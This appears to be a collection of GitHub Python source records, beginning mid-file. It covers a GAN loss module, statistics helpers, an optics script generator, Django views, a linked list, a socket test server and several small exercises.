= losses.SpatialCorrelativeLoss(patch_nums=self.num_patches, patch_size=patch_size)\n self.sc_layers = sc_layers\n\n self.setup_F()\n self.F.train().requires_grad_(False).to(self.device)\n\n def setup_F(self):\n fimg = torch.empty([1, 3, self.resolution, self.resolution], device=self.device)\n feat = self.netPre(fimg, self.sc_layers, encode_only=True)\n if isinstance(feat, tuple):\n feat = feat[1]\n if self.adaptive_loss:\n loss_weights = Parameter(torch.Tensor(len(feat)))\n loss_weights.data.fill_(1 / len(feat))\n self.F.loss_weights = loss_weights\n\n def calculate_SC_loss(self, feat_net: torch.nn.Module, src, tgt):\n n_layers = len(self.sc_layers)\n feats_tgt = feat_net(tgt, self.sc_layers, encode_only=True)\n feats_src = feat_net(src, self.sc_layers, encode_only=True)\n if isinstance(feats_tgt, tuple):\n feats_tgt = feats_tgt[1]\n if isinstance(feats_src, tuple):\n feats_src = feats_src[1]\n\n if self.adaptive_loss:\n loss_weights = self.F.loss_weights\n posw = torch.abs(loss_weights)\n weights = posw / torch.sum(posw) + (1 / (5 * len(self.sc_layers)))\n weights = weights / torch.sum(weights)\n else:\n weights = [ 1 / n_layers for i in range(0, n_layers) ]\n\n total_loss = 0.0\n for i, (feat_src, feat_tgt, weight) in enumerate(zip(feats_src, feats_tgt, weights)):\n loss = self.criterion_sc.loss(feat_src, feat_tgt, None, i)\n total_loss += loss.mean() * weight\n\n if not self.criterion_sc.conv_init:\n self.criterion_sc.update_init_()\n\n return total_loss \n\n def run_G(self, real, update_emas=False):\n fake = self.G(real)\n return fake\n\n def run_D(self, img, blur_sigma=0, update_emas=False):\n blur_size = np.floor(blur_sigma * 3)\n if blur_size > 0:\n with torch.autograd.profiler.record_function('blur'):\n f = torch.arange(-blur_size, blur_size + 1, device=img.device).div(blur_sigma).square().neg().exp2()\n img = upfirdn2d.filter2d(img, f / f.sum())\n\n logits = self.D(img)\n return logits\n\n def accumulate_gradients(self, phase, real_A, real_B, gain, cur_nimg):\n assert phase in ['Gmain', 'Greg', 'Gboth', 'Dmain', 'Dreg', 'Dboth']\n do_Gmain = (phase in ['Gmain', 'Gboth'])\n do_Dmain = (phase in ['Dmain', 'Dboth'])\n if phase in ['Dreg', 'Greg']: return # no regularization needed for PG\n\n # blurring schedule\n blur_sigma = max(1 - cur_nimg / (self.blur_fade_kimg * 1e3), 0) * self.blur_init_sigma if self.blur_fade_kimg > 1 else 0\n\n if do_Gmain:\n\n # Gmain: Maximize logits for generated images.\n with torch.autograd.profiler.record_function('Gmain_forward'):\n real = torch.cat([real_A, real_B], dim=0) if self.sc_idt or self.lambda_identity > 0 else real_A\n fake = self.run_G(real)\n fake_B = fake[:real_A.size(0)]\n fake_idt_B = fake[real_A.size(0):]\n gen_logits = self.run_D(fake_B, blur_sigma=blur_sigma)\n loss_Gmain_GAN = (-gen_logits).mean()\n loss_Gmain = self.lambda_GAN * loss_Gmain_GAN\n training_stats.report('Loss/scores/fake', gen_logits)\n training_stats.report('Loss/signs/fake', gen_logits.sign())\n training_stats.report('Loss/G/gan', loss_Gmain_GAN)\n\n if self.lambda_identity > 0:\n loss_Gmain_idt = self.criterionIdt(fake_idt_B, real_B)\n loss_Gmain = loss_Gmain + self.lambda_identity * loss_Gmain_idt\n training_stats.report('Loss/G/identity', loss_Gmain_idt)\n\n if self.lambda_SC > 0:\n loss_Gmain_SC = self.calculate_SC_loss(self.netPre, real_A, fake_B)\n training_stats.report('Loss/G/SC', loss_Gmain_SC)\n if self.sc_idt:\n loss_Gmain_SC_idt = self.calculate_SC_loss(self.netPre, real_B, fake_idt_B)\n training_stats.report('Loss/G/SC_idt', loss_Gmain_SC_idt)\n loss_Gmain_SC = (loss_Gmain_SC + loss_Gmain_SC_idt) * 0.5\n loss_Gmain = loss_Gmain + loss_Gmain_SC\n\n training_stats.report('Loss/G/loss', loss_Gmain)\n\n with torch.autograd.profiler.record_function('Gmain_backward'):\n loss_Gmain.backward()\n\n if do_Dmain:\n\n # Dmain: Minimize logits for generated images.\n with torch.autograd.profiler.record_function('Dgen_forward'):\n gen_img = self.run_G(real_A, update_emas=True)\n gen_logits = self.run_D(gen_img, blur_sigma=blur_sigma)\n loss_Dgen = (F.relu(torch.ones_like(gen_logits) + gen_logits)).mean()\n\n # Logging\n training_stats.report('Loss/scores/fake', gen_logits)\n training_stats.report('Loss/signs/fake', gen_logits.sign())\n\n with torch.autograd.profiler.record_function('Dgen_backward'):\n loss_Dgen.backward()\n\n # Dmain: Maximize logits for real images.\n with torch.autograd.profiler.record_function('Dreal_forward'):\n real_img_tmp = real_B.detach().requires_grad_(False)\n real_logits = self.run_D(real_img_tmp, blur_sigma=blur_sigma)\n loss_Dreal = (F.relu(torch.ones_like(real_logits) - real_logits)).mean()\n\n # Logging\n training_stats.report('Loss/scores/real', real_logits)\n training_stats.report('Loss/signs/real', real_logits.sign())\n training_stats.report('Loss/D/loss', loss_Dgen + loss_Dreal)\n\n with torch.autograd.profiler.record_function('Dreal_backward'):\n loss_Dreal.backward()\n","repo_name":"lidotcircle/PatchAttnNCE","sub_path":"training/sc_loss.py","file_name":"sc_loss.py","file_ext":"py","file_size_in_byte":7669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40834586048","text":"import numpy as np\n\n\ndef med_mad(data, factor=None, axis=None, keepdims=False):\n \"\"\"Compute the Median Absolute Deviation, i.e., the median\n of the absolute deviations from the median, and the median\n\n :param data: A :class:`ndarray` object\n :param factor: Factor to scale MAD by. Default (None) is to be consistent\n with the standard deviation of a normal distribution\n (i.e. mad( N(0,\\sigma^2) ) = \\sigma).\n :param axis: For multidimensional arrays, which axis to calculate over\n :param keepdims: If True, axis is kept as dimension of length 1\n\n :returns: a tuple containing the median and MAD of the data\n \"\"\"\n if factor is None:\n factor = 1.4826\n dmed = np.median(data, axis=axis, keepdims=True)\n dmad = factor * np.median(abs(data - dmed), axis=axis, keepdims=True)\n if axis is None:\n dmed = dmed.flatten()[0]\n dmad = dmad.flatten()[0]\n elif not keepdims:\n dmed = dmed.squeeze(axis)\n dmad = dmad.squeeze(axis)\n return dmed, dmad\n\n\ndef mad(data, factor=None, axis=None, keepdims=False):\n \"\"\"Compute the Median Absolute Deviation, i.e., the median\n of the absolute deviations from the median, and (by default)\n adjust by a factor for asymptotically normal consistency.\n\n :param data: A :class:`ndarray` object\n :param factor: Factor to scale MAD by. Default (None) is to be consistent\n with the standard deviation of a normal distribution\n (i.e. mad( N(0,\\sigma^2) ) = \\sigma).\n :param axis: For multidimensional arrays, which axis to calculate the median over.\n :param keepdims: If True, axis is kept as dimension of length 1\n\n :returns: the (scaled) MAD\n \"\"\"\n _ , dmad = med_mad(data, factor=factor, axis=axis, keepdims=keepdims)\n return dmad\n\n\ndef studentise(x, axis=None):\n \"\"\" Studentise a numpy array along a given axis\n :param x: A :class:`ndaray`\n :param axis: axis over which to studentise\n\n :returns: A :class:`nd.array` with same shape as x\n \"\"\"\n m = np.mean(x, axis=axis, keepdims=True)\n s = np.std(x, axis=axis, keepdims=True)\n s = np.where(s > 0.0, s, 1.0)\n return np.divide(x - m, s)\n","repo_name":"nanoporetech/sloika","sub_path":"sloika/maths.py","file_name":"maths.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"52"} +{"seq_id":"27721199024","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 18 16:51:43 2022\n\n@author: joao.astolfo\n\"\"\"\nimport Shadow\nimport inspect\nimport numpy\n\ndef make_python_script_from_list(element_list, script_file=\"\"):\n \"\"\"\n program to build automatically a python script to run shadow3\n the system is read from a list of instances of Shadow.Source and Shadow.OE\n :argument list of optical_elements A python list with intances of Shadow.Source and Shadow.OE objects\n :param script_file: a string with the name of the output file (default=\"\", no output file)\n :return: template with the script\n \"\"\"\n\n template = \"\"\"import Shadow\nimport numpy as np\nfrom optlnls.hybrid import run_hybrid\n\nfrom orangecontrib.shadow.util.shadow_objects import ShadowBeam, ShadowOpticalElement, ShadowSource\n\n\nbeam = ShadowBeam()\n\"\"\"\n\n n_elements = len(element_list)\n params = []\n for i, element in enumerate(element_list):\n if isinstance(element[1], Shadow.Source):\n template += \"oe0 = Shadow.Source()\\n\"\n elif isinstance(element[1], Shadow.OE):\n template += \"oe%d = Shadow.OE()\\n\"%(i)\n elif isinstance(element[1], Shadow.IdealLensOE):\n template += \"oe%d = Shadow.IdealLensOE()\\n\"%(i)\n else:\n raise Exception(\"Error: Element not known\")\n \n with element[0].hybrid_dialog.param as elem:\n params.append('''beam, diff_plane={0}, calcType={1}, dist_to_img_calc={2},\n distance={3}, focal_length_calc={4},\n focallength={5}, nf={6}, nbins_x={7}, nbins_z={8}, npeak={9},\n fftnpts={10}, write_file={11}, automatic={12},\n send_original_beam={13}'''.format(elem.diff_plane, elem.calcType,\n elem.dist_to_img_calc, elem.distance, elem.focallength_calc, elem.focallength_value, elem.nfc,\n elem.nbins_x, elem.nbins_z, elem.npeaks, elem.fft, elem.write_file, elem.automatic, elem.send_original_beam))\n\n template += \"\\n#\\n# Define variables. See meaning of variables in: \\n\" \\\n \"# https://raw.githubusercontent.com/srio/shadow3/master/docs/source.nml \\n\" \\\n \"# https://raw.githubusercontent.com/srio/shadow3/master/docs/oe.nml\\n#\\n\"\n\n for ioe, oe1B in enumerate(element_list):\n template += \"\\n\"\n if isinstance(oe1B[1], Shadow.Source):\n oe1 = Shadow.Source()\n elif isinstance(oe1B[1],Shadow.OE):\n oe1 = Shadow.OE()\n elif isinstance(oe1B[1],Shadow.IdealLensOE):\n oe1 = Shadow.IdealLensOE()\n else:\n raise Exception(\"Error: Element not known\")\n\n if isinstance(oe1B[1], Shadow.IdealLensOE):\n template += \"oe\"+str(ioe)+\".T_SOURCE = \"+str(oe1B[1].T_SOURCE).strip()+\"\\n\"\n template += \"oe\"+str(ioe)+\".T_IMAGE = \"+str(oe1B[1].T_IMAGE).strip()+\"\\n\"\n template += \"oe\"+str(ioe)+\".focal_x = \"+str(oe1B[1].focal_x).strip()+\"\\n\"\n template += \"oe\"+str(ioe)+\".focal_z = \"+str(oe1B[1].focal_z).strip()+\"\\n\"\n else:\n memB = inspect.getmembers(oe1B[1])\n mem = inspect.getmembers(oe1)\n for i, var in enumerate(memB):\n ivar = mem[i]\n ivarB = memB[i]\n if ivar[0].isupper():\n if isinstance(ivar[1],numpy.ndarray):\n if not( (ivar[1] == ivarB[1]).all()) :\n line = \"oe\"+str(ioe)+\".\"+ivar[0]+\" = np.array(\"+str(ivarB[1].tolist())+ \")\\n\"\n template += line\n else:\n if ivar[1] != ivarB[1]:\n if isinstance(ivar[1],(str,bytes)):\n line = \"oe\"+str(ioe)+\".\"+ivar[0]+\" = \"+str(ivarB[1]).strip()+\"\\n\"\n #line = re.sub('\\s{2,}', ' ',line)\n if \"SPECIFIED\" in line:\n pass\n else:\n template += line\n else:\n line = \"oe\"+str(ioe)+\".\"+ivar[0]+\" = \"+str(ivarB[1])+\"\\n\"\n template += line\n \n template += \"\"\"\\n##########################\\n\n# Run SHADOW to create the source\nsrc = ShadowSource(oe0)\nbeam = ShadowBeam().traceFromSource(src)\"\"\"\n\n template_oeA = \"\"\"\\n\n# Run optical element {0}\nprint(\" Running optical element: %d\"%({0}))\noe_{0} = ShadowOpticalElement(oe{0})\"\"\"\n\n for i in range(1, n_elements):\n template += template_oeA.format(i,\"%02d\"%(i))\n if isinstance(element_list[i][1],Shadow.OE):\n template += \"\\nbeam = beam.traceFromOE(beam, oe_{0}, widget_class_name='{1}')\".format(i, element_list[i][0].hybrid_dialog.name)\n if element_list[i][0].use_hybrid:\n template += '\\nbeam = run_hybrid('+params[i]+')'\n elif isinstance(element_list[i][1],Shadow.IdealLensOE):\n template += \"\\nbeam = beam.traceIdealLensOE(beam, oe_{0}, widget_class_name='{1}')\".format(i, element_list[i][0].hybrid_dialog.name)\n if element_list[i][0].use_hybrid:\n template += '\\nbeam = run_hybrid('+params[i]+')'\n \n \n template += \"\"\"\\n\n\n# Shadow.ShadowTools.plotxy(beam._beam,1,3,nbins=101,nolost=1,title=\"Real space\")\n# Shadow.ShadowTools.plotxy(beam._beam,1,4,nbins=101,nolost=1,title=\"Phase space X\")\n# Shadow.ShadowTools.plotxy(beam._beam,3,6,nbins=101,nolost=1,title=\"Phase space Z\")\"\"\"\n\n if script_file != \"\":\n open(script_file, \"wt\").write(template)\n print(\"File written to disk: %s\"%(script_file))\n\n return template","repo_name":"oasys-lnls-kit/OASYS1-LNLS-ShadowOui","sub_path":"orangecontrib/shadow/lnls/widgets/utility/info/funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":5723,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"38536446244","text":"#!/usr/bin/env python3\n\n\n'''\n10. Write a Python program that matches a word at the beginning of a string.\n'''\n\n\n\nimport re\n\n\ndef matches(text):\n pattern = r'^random'\n match_find = re.finditer(pattern, text)\n for match in match_find:\n if match:\n return 'Found.'\n return 'Not Found.'\n\n\nprint(matches('random'))\n\nprint(matches('random string'))\n\nprint(matches('string random'))\n\nprint(matches('randomim'))\n\nprint(matches('testerandom'))\n","repo_name":"Hoklifter/studies","sub_path":"Python/RegEx/10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"10167380836","text":"from django.shortcuts import render,redirect\nfrom .models import Question,Comment\n# Create your views here.\ndef index(request):\n questions = Question.objects.all()\n return render(request,\"choice/index.html\",{\"questions\":questions})\n \ndef new(request):\n return render(request,\"choice/new.html\")\n \ndef create(request):\n title = request.POST.get(\"title\")\n c1 = request.POST.get(\"c1\")\n c2 = request.POST.get(\"c2\")\n \n # 위의 코드 한줄로\n Question.objects.create(title=title,c1=c1,c2=c2)\n \n return redirect(\"/choices\")\n \ndef read(request,id):\n question = Question.objects.get(pk=id)\n return render(request,\"choice/read.html\",{\"question\":question})\n \ndef delete(request,id):\n question = Question.objects.get(pk=id)\n question.delete()\n \n return redirect(\"/choices\")\n \ndef edit(request,id):\n question = Question.objects.get(pk=id)\n return render(request,\"choice/edit.html\",{\"question\":question}) \n\ndef update(request,id):\n question=Question.objects.get(pk=id)\n title=request.POST.get(\"title\")\n c1=request.POST.get(\"c1\")\n c2=request.POST.get(\"c2\")\n \n \n question.title = title\n question.c1= c1\n question.c2= c2\n question.save()\n \n return redirect(f\"/choices/{id}\") \n \ndef comment_create(request,id):\n question = Question.objects.get(pk=id)\n content = request.POST.get(\"content\")\n c1Cnt = request.POST.get(\"c1\")\n c2Cnt = request.POST.get(\"c2\")\n if c1Cnt == \"1\" : \n question.c1Cnt += 1\n question.save()\n else : \n question.c2Cnt += 1\n question.save() \n \n Comment.objects.create(question = question, content=content)\n # from \n \n \n return redirect(f\"/choices/{id}/\")","repo_name":"solingMaster/Either","sub_path":"either/choice/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20009463984","text":"import numpy as np\nimport pandas as pd\nfrom dataclasses import dataclass,field\nfrom typing import Literal,Optional,Dict,List,Union,Any\nContentTypes = Literal[\"text\",\"table\",\"image\",\"audio\"]\n\n@dataclass\nclass Document:\n id:str\n content:Union[str, pd.dataframe]\n content_type:ContentTypes=field(default=\"text\")\n score = Optional[float]=None\n embedding:Optional[np.ndarray] = None\n\n\n def __init__(self,\n content,\n content_type,\n id,\n score,\n embedding):\n\n if content is None:\n raise ValueError(\"doc is empty\")\n \n self.content = content\n self.content_type = content_type\n self.score = score\n self.meta = meta or {}\n\n if embedding is not None:\n embedding = np.asarray(embedding)\n self.embedding = embedding\n\n if id is not None:\n self.id:str = str(id)\n else:\n self.id = \"default_id\"\n \n def to_dict(self,field_map:Optional[Dict[str,Any]]=None) -> Dict:\n if not field_map:\n field_map = {}\n \n inv_field_map = {v:k for k, v in field.map.items()}\n _doc = Dict[str, str] = {}\n for k, v in self.__dict__.items():\n if k.startswith(\"-\"):\n continue\n if k == \"content\":\n if self.content_type == \"table\" and isinstance(self.content, pd.DataFrame):\n v = [self.content.columns.tolist()] + self.content.values.tolist()\n k = k if k not in inv_field_map else inv_field_map[k]\n _doc[k] = v\n return _doc\n \n def __eq__(self,other):\n content = getattr(other, \"content\", None)\n is_content_equal = content == self.content\n return(\n isinstance(other, self.__class__)\n and is_content_equal\n and getattr(other, \"content_type\") == self.content_type\n and getattr(other, \"id\") == self.id \n and getattr(other, \"score\") == self.score\n and np.array.equal(getattr(other, \"embeddig\") , self.embedding)\n )\n \n \n \n\n\n\n\n","repo_name":"Autobot37/InformationEngine","sub_path":"schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"17151664473","text":"from setuptools import setup\nfrom Cython.Build import cythonize\nfrom distutils.extension import Extension\nimport sys\n\next = Extension(\n \"kf2.core\",\n [\n \"kf2/core.pyx\",\n ],\n extra_compile_args=[\n \"-DKF_EMBED\",\n \"-DKF_OPENCL\",\n \"-DKF_SIMD=4\",\n \"-DNPY_NO_DEPRECATED_API\",\n \"-O2\",\n ],\n language=\"c++\",\n include_dirs=[\n \"../embed\",\n \"../common\",\n \"../fraktal_sft\",\n \"../glad/include\",\n *sys.path,\n \"/usr/include/pixman-1\",\n \"/usr/include/OpenEXR\",\n \"/usr/include/OpenEXR\",\n ],\n libraries=[\n \"kf2-embed\",\n 'mpfr',\n ],\n library_dirs=[\n \"..\",\n ],\n )\n\nsetup(\n ext_modules=cythonize(\n ext,\n language_level=3,\n ),\n)\n","repo_name":"smurfix/kf2-py","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"28980251009","text":"import requests\n\ndef test_get_user_image():\n\n endpoint = (\"https://api-nodejs-todolist.herokuapp.com/user/5ddccbec6b55da001759722c/avatar\", \"sample.png\")\n img = PIL.Image.open(\"sample.png\")\n img.show()\n test_file = open(\"/Users/asanmukh/Desktop/Screenshot 2022-01-24 at 4.22.51 PM.png\", \"rb\")\n test_response = requests.post(endpoint, files={\"form_field_name\": test_file})\n if test_response.ok:\n print(\"Upload completed successfully!\")\n print(test_response.text)\n else:\n print(\"Something went wrong!\")","repo_name":"asanmukh/API_test","sub_path":"Get_user_image.py","file_name":"Get_user_image.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72286103525","text":"import curses\n\n\ndef run_input(stdscr, title):\n stdscr.clear()\n\n stdscr.addstr(0, 0, title)\n y = 2\n\n stdscr.addstr(y, 0, \"> \")\n curses.echo()\n curses.curs_set(1)\n\n stdscr.move(y, 2)\n\n user_input = stdscr.getstr().decode().strip()\n\n curses.noecho()\n curses.curs_set(0)\n stdscr.refresh()\n\n return user_input\n","repo_name":"Eirmas/feedapp","sub_path":"iot-device/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41103292747","text":"from src.core import Unsplash\n\n\nclass Search(Unsplash):\n def __init__(self):\n super().__init__()\n link = \"search/photos?client_id=\"\n self.search_url = self.url + link + self.client_id\n\n @staticmethod\n def search(query: str, page: int, per_page: int, order_by: str, *args, **kwargs):\n \"\"\"\n :param query: Search terms. (Optional; default: `nature`)\n :param page: Page number to retrieve. (Optional; default: 1)\n :param per_page: Number of items per page. (Optional; default: 10)\n :param order_by: How to sort the photos. (Optional; default: relevant). Valid values are `latest` and `relevant`\n :return: `search` parameters (dict)\n \"\"\"\n params = {\n \"query\": query,\n \"page\": page,\n \"per_page\": per_page,\n \"order_by\": order_by\n }\n\n if len(args) and len(kwargs) != 0:\n for i, j in zip(kwargs[\"args\"], kwargs[\"kwargs\"]):\n params[j] = i\n\n return params\n\n @staticmethod\n def json_data(data):\n return data.json()[\"results\"]\n","repo_name":"aliosmankaya/unsplash-api","sub_path":"src/core/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36232811026","text":"# 3진법 뒤집기\r\n# 1차 시도 통과\r\n\r\n\r\ndef solution(n):\r\n answer = 0\r\n th = ''\r\n # while n: 으로 하면 자연스럽게 n // 3 == 0 이 되면 멈춤\r\n while n:\r\n th += str(n % 3)\r\n n = n // 3\r\n\r\n for i in range(len(th[::-1])):\r\n answer += int(th[::-1][i]) * (3**i)\r\n\r\n return answer\r\n\r\nprint(solution(45))\r\n\r\n'''\r\n타인풀이\r\n\r\ndef solution(n):\r\n tmp = ''\r\n while n:\r\n tmp += str(n % 3)\r\n n = n // 3\r\n\r\n answer = int(tmp, 3)\r\n # int('0021', 3) 하면 자동으로 3진수 역계산이 되서 나옴\r\n return answer \r\n\r\n'''\r\n\r\n# class로 풀기\r\n\r\nclass Three:\r\n def __init__(self, num):\r\n self.num = num\r\n self.th = ''\r\n\r\n def trans_th(self):\r\n while self.num:\r\n self.th += str(self.num % 3)\r\n self.num = self.num // 3\r\n \r\n def trans_re(self):\r\n return int(self.th, 3)\r\n\r\ndef solution_2(n):\r\n n = Three(n)\r\n n.trans_th()\r\n return n.trans_re()\r\n\r\nprint(solution_2(45))\r\n ","repo_name":"jomujin/Skill_Check","sub_path":"PROGRAMMERS_SKILLCHECK/SC_level1/SC_level1_68935.py","file_name":"SC_level1_68935.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36278444188","text":"from MyListNode import MyListNode\n\n\nclass MyLinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n self.head = self.tail\n self.size = 0\n\n def get_head(self):\n \"\"\"for testing purposes, returns the head of the linked list\n \"\"\"\n return self.head\n\n def get_size(self):\n \"\"\"returns the number of nodes in the linked list in O(1)\n \"\"\"\n return self.size\n\n def add_first(self, element):\n \"\"\"creates a node including the given element and adds it to the beginning of the linked list\n @param element of the new node to be added\n @raises ValueError if the element is None\n \"\"\"\n if element is None:\n raise ValueError\n else:\n new_node = MyListNode(element)\n new_node.next = self.head\n self.head = new_node\n self.size += 1\n\n def add_last(self, element):\n \"\"\"creates a node including the given element and addsit to the end of the linked list\n @param element of the new node to be added\n @raises ValueError if the element is None\n \"\"\"\n if element is None:\n raise ValueError\n else:\n new_node = MyListNode(element)\n if self.head is None:\n self.head = new_node\n self.size += 1\n else:\n cur = self.head\n while cur.next:\n cur = cur.next\n cur.next = new_node\n self.size += 1\n\n def add_sorted(self, element):\n \"\"\"creates a node including the given element and adds it at the correct position to the linked list sorted in ascending order\n @param element of the new node to be added\n @raises ValueError if the element is None\n \"\"\"\n if element is None:\n raise ValueError\n else:\n new_node = MyListNode(element)\n if self.head is None:\n new_node.next = self.head\n self.head = new_node\n self.size += 1\n elif self.head.element >= new_node.element:\n new_node.next = self.head\n self.head = new_node\n self.size += 1\n else:\n cur = self.head\n while cur.next and cur.next.element < new_node.element:\n cur = cur.next\n\n new_node.next = cur.next\n cur.next = new_node\n self.size += 1\n\n def clear(self):\n \"\"\"removes all nodes from the linked list in O(1)\n \"\"\"\n self.head = None\n self.size = 0\n\n def remove_first(self):\n \"\"\"returns the first element of the linked list and removes the node containing this element\n @return the element of the node that has been removed\n \"\"\"\n if self.head is not None:\n if self.head is self.tail:\n self.tail = None\n self.head = self.head.next\n self.size -= 1\n\n def get_first(self):\n \"\"\"returns the first element of the linked list (without removing it)\n @return element of the first node\n \"\"\"\n return self.head.element\n\n def contains(self, element):\n \"\"\"returns true if a given element is in the linked list; false otherwise\n @return True or False\n @raises ValueError if the element is None\n \"\"\"\n if element is None:\n raise ValueError\n else:\n cur = self.head\n while cur is not None:\n if cur.element is element:\n return True\n cur = cur.next\n return False\n\n def to_list(self):\n \"\"\"returns a list representation of the linked list starting with the first element (index 0)\n @return a list\n \"\"\"\n cur = self.head\n the_list = []\n while cur is not None:\n the_list.append(cur.element)\n cur = cur.next\n return the_list\n\n def to_string(self):\n \"\"\"returns a string representation of the linked list: \"[1]-> [5]-> [8]-> [20]\"\n @return a string: \"[1][5][8][20]\"\n \"\"\"\n cur = self.head\n the_string = \"\"\n while cur is not None:\n the_string += \"[\"+str(cur.element)+\"]\"\n cur = cur.next\n return the_string\n\n # Support funtions\n\n def print_list(self):\n cur = self.head\n while cur is not None:\n print(cur.element)\n cur = cur.next\n\n# test_list = MyLinkedList()\n# test_list.add_sorted(1)\n# test_list.add_sorted(9)\n# test_list.add_sorted(8)\n# test_list.add_sorted(2)\n# test_list.add_sorted(11)\n# test_list.print_list()\n# print(\"With remove first\")\n# test_list.remove_first()\n# test_list.print_list()\n# print(test_list.contains(5))\n# my_list = test_list.to_list()\n# print(my_list)\n# my_string = test_list.to_string()\n# print(my_string)\n# print(test_list.get_first())\n# test_list.clear()\n# print(\"My list after clear func\")\n# test_list.print_list()\n# test_list.add_sorted(1)\n# test_list.add_sorted(9)\n# test_list.print_list()\n","repo_name":"szucsaaron/Algo_dat","sub_path":"PriotiryQueue/MyLinkedList.py","file_name":"MyLinkedList.py","file_ext":"py","file_size_in_byte":5134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17248768094","text":"import socket\nimport threading\nimport time\nimport wx\nimport json\nimport usbDev\n\nkeywords = {'Python',\n 'wxpython',\n 'SocketProgramming'\n }\n\nclass ServerEvent(wx.PyEvent):\n \"\"\"\n A class ServerEvent with init method\n wxWindow is the base class for all windows and \n represents any visible object on screen.\n \"\"\"\n def __init__(self, data):\n \n \"\"\"\n here the server sets the event type. \n Args:\n self: The self parameter is a reference to the current \n instance of the class,and is used to access variables\n that belongs to the class.\n parent: Pointer to a parent window.\n data: creates an object\n Returns:\n None\n \"\"\"\n \"\"\"Init Result Event.\"\"\"\n wx.PyEvent.__init__(self)\n self.SetEventType(EVT_RESULT_ID)\n self.data = data\n \n\nclass ServerHc:\n \"\"\"\n A class ServerHc with init method\n wxWindow is the base class for all windows and \n represents any visible object on screen.\n \"\"\"\n def __init__(self, host='', port: int = 5567):\n \"\"\"\n here the server sets Ip address, port. \n Args:\n self: The self parameter is a reference to the current \n instance of the class,and is used to access variables\n that belongs to the class.\n parent: Pointer to a parent window.\n host: host ip address ipaddress \n port : port number of that particular ipaddress.\n Returns:\n None\n \"\"\"\n self.IP = \"\"\n self.PORT = port\n self.ADDR = ((self.IP, self.PORT))\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n self.socket.bind((host, port))\n self.socket.listen(5)\n except:\n print(\"Server Init failed\")\n #print('Test Host Server Listeneing port: ' + host + ':' + str(port))\n self.bind_addr = host + ':' + str(port)\n self.conn_socket = None\n self.addr = None\n\n def close(self):\n \"\"\"\n Close the server connection\n Args:\n self: The self parameter is a reference to the current \n instance of the class,and is used to access variables\n that belongs to the class.\n parent: Pointer to a parent window.\n Returns:\n None\n \"\"\"\n self.socket.close()\n \n\nclass StayAccept(threading.Thread):\n \"\"\"\n A class StayAccept with init method\n wxWindow is the base class for all windows and \n represents any visible object on screen.\n \"\"\"\n def __init__(self, parent):\n \"\"\"\n here the server is wait the connection. \n Args:\n self: The self parameter is a reference to the current \n instance of the class,and is used to access variables\n that belongs to the class.\n parent: Pointer to a parent window.\n Returns:\n None\n \"\"\"\n super(StayAccept, self).__init__()\n self.window = parent\n self.wait = True\n self.rs = None\n \n def run(self) -> None:\n \"\"\"\n here the server is running connection\n establsihed to new connection info. \n Args:\n self: The self parameter is a reference to the current \n instance of the class,and is used to access variables\n that belongs to the class.\n parent: Pointer to a parent window.\n data: creates an object\n Returns:\n None\n \"\"\"\n while self.wait:\n try:\n self.window.hcserver.conn_socket, self.window.hcserver.addr = \\\n self.window.hcserver.socket.accept()\n new_conn_info = '\\nnew connection: ' + \\\n str(self.window.hcserver.addr)\n self.rs = RequestSync(self.window)\n self.rs.start()\n except:\n pass\n\n def close_connection(self):\n \"\"\"\n here the server connection is close.\n Args:\n self: The self parameter is a reference to the current \n instance of the class,and is used to access variables\n that belongs to the class.\n parent: Pointer to a parent window.\n Returns:\n None\n \"\"\"\n self.wait = False\n\n \nclass RequestSync(threading.Thread):\n \"\"\"\n A class RequestSync with init method\n wxWindow is the base class for all windows and \n represents any visible object on screen.\n \"\"\"\n def __init__(self, parent):\n \"\"\"\n here the server requesting using threading.\n Args:\n self: The self parameter is a reference to the current \n instance of the class,and is used to access variables\n that belongs to the class.\n parent: Pointer to a parent window.\n Returns:\n None\n \"\"\"\n super(RequestSync, self).__init__()\n self.window = parent\n self._running = True\n \n def terminate(self):\n \"\"\"\n here the server connection is terminate.\n Args:\n self: The self parameter is a reference to the current \n instance of the class,and is used to access variables\n that belongs to the class.\n Returns:\n None\n \"\"\"\n self._running = False\n\n def run(self) -> None:\n \"\"\"\n This message sent to client, when it gets connected with this server\n Args:\n self: The self parameter is a reference to the current \n instance of the class,and is used to access variables\n that belongs to the class.\n Returns:\n None\n \"\"\"\n # This message sent to client, when it gets connected with this server\n while self._running:\n try:\n creq = self.window.hcserver.conn_socket.recv(1024)\n data = json.loads(creq.decode())\n except ConnectionResetError:\n self.window.hcserver.conn_socket.close()\n disconnect_info = str(self.window.hcserver.addr) + ' socket\\n'\n 